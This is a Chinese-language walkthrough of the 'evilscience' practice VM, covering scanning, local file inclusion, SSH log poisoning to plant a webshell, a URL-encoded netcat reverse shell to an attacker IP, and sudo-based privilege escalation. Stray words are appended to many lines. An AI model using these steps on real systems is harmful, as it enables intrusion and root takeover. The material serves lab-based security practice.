kali滲透綜合靶機(十六)--evilscience靶機php
1、主機發現python
1.netdiscover -i eth0 -r 192.168.10.0/24shell
2、端口掃描bash
1. masscan --rate=10000 -p0-65535 192.168.10.195ssh
三端口服務識別測試
1. nmap -sV -T4 -O -p 22,80 192.168.10.195 編碼
4、漏洞查找與利用url
1.目錄掃描spa
2. 發現http://192.168.10.195/fuck,下載下來沒啥用.net
3.發現http://192.168.10.195/index.php?file=about.php 測試存在本地文件包含
4.包含/etc/passwd,失敗,嘗試用burp進行模糊測試,能夠看到能夠包含/var/log/auth.log文件,能夠利用ssh登陸產生錯誤日誌
5. 利用ssh登陸產生錯誤日誌,能夠看到錯誤信息寫入到日誌中,能夠利用ssh錯誤日誌寫入一句話木馬
6.利用ssh日誌寫入一句話木馬
7.測試一句話是否成功寫入,下圖能夠看到成功執行,而後能夠執行任何系統命令
8.反彈shell,須要對反彈shell中特殊符號進行url編碼,不要對整個url進行編碼
mknod+backpipe+p+%26%26+nc+192.168.1.66+9999+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe
9.kali端開啓監聽,而後用python -c ‘import pty;pty.spawn(「/bin/bash」)’,從新打開一個終端
10.上圖看到用python -c 打開的一個終端仍是受限的,須要在用awk ‘BEGIN{system(「/bin/bash」)}’從新打開一個終端
提權一:
1.Sudo -l查看是否屬於sudo組
2. 能夠使用sudo權限不須要密碼執行xxxlogauditorxxx.py,查看一下該文件的權限, 該py文件的配置錯誤,致使能夠直接以root權限執行命令,查看腳本存在命令執行漏洞
3.msfvenom生成一個payload,上傳到目標,增長執行權限
4.sudo運行該腳本,
5.kali開啓監聽
提權二:
1.首先給/etc/sudoers加寫入權限
2.而後把當前用戶以不用密碼的登陸方式添加到sudo組
3.sudo -i 得到root權限